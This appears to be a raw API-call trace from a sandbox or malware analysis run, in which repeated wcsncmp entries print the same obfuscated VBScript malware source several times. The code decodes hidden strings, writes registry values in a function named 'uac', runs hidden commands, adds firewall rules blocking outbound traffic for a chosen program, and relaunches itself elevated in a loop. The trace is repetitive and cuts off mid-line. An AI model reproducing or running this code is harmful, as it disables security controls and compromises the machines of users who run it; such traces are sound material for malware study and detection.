bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.943] wcsncmp (_String1="d(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.943] wcsncmp (_String1="(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.943] wcsncmp (_String1="s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.943] wcsncmp (_String1="1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite 